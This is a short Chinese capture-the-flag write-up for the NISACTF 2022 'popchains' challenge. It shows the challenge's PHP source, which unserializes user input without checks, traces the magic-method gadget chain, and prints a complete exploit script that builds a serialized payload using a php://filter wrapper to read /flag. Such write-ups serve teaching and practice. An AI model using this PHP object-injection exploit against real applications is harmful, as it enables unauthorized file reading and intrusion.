NSS [NISACTF 2022]popchains
先看看题目,源码如下。
<?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'])){ @unserialize($_GET['wish']); //@为了不报错 } else{ $a=new Road_is_Long; highlight_file(__FILE__); } class Road_is_Long{ public $page; public $string; public function __construct($file='index.php'){ $this->page = $file; } public function __toString(){ return $this->string->page; } public function __wakeup(){ if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) { echo "You can Not Enter 2022"; $this->page = "index.php"; } } } class Try_Work_Hard{ protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Make_a_Change{ public $effort; public function __construct(){ $this->effort = array(); } public function __get($key){ $function = $this->effort; return $function(); } }
服务器反序列化Road_is_Long—>Road_is_Long::wakeup()—>Road_is_Long::toString()–>Make_a_Change::get()—>Try_Work_Hard::invoke()—>Try_Work_Hard::append()
exp: <?php class Road_is_Long{ public $page; public $string; public function __construct($file='index.php'){ $this->page = $file; } public function __toString(){ return $this->string->page; } public function __wakeup(){ if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) { echo "You can Not Enter 2022"; $this->page = "index.php"; } } } class Try_Work_Hard{ protected $var="php://filter/read=convert.base64-encode/resource=/flag"; //protected不能从外面赋值 public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Make_a_Change{ public $effort; public function __construct(){ $this->effort = array(); } public function __get($key){ $function = $this->effort; return $function(); } } $road1 = new Road_is_Long(); $road2 = new Road_is_Long(); $try = new Try_Work_Hard(); $make = new Make_a_Change(); $road1->page = $road2; $road2->string=$make; $make->effort=$try; $jay17 = serialize($road1); echo urlencode($jay17);
